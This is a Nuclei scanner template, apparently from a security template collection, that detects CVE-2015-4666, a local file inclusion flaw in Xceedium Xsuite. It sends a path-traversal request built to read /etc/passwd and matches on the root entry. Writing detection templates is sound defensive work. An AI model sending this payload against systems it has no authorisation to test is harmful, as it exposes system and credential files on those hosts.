46 lines
1.9 KiB
YAML
46 lines
1.9 KiB
YAML
id: CVE-2015-4666
|
|
|
|
info:
|
|
name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution.
|
|
remediation: |
|
|
Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor.
|
|
reference:
|
|
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
|
|
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4666
|
|
- https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
|
|
- https://www.exploit-db.com/exploits/37708/
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2015-4666
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02372
|
|
epss-percentile: 0.89823
|
|
cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xceedium
|
|
product: xsuite
|
|
tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402201a7b1f661191d5cf0cd3b6698c57549de62930e8b8b37f08e83b34383402682302202a841a227aba2b9fd4c73cf72d41a36ca80ce54068a4ff45c65ea18ea873b68e:922c64590222798bb761d5b6d8e72950 |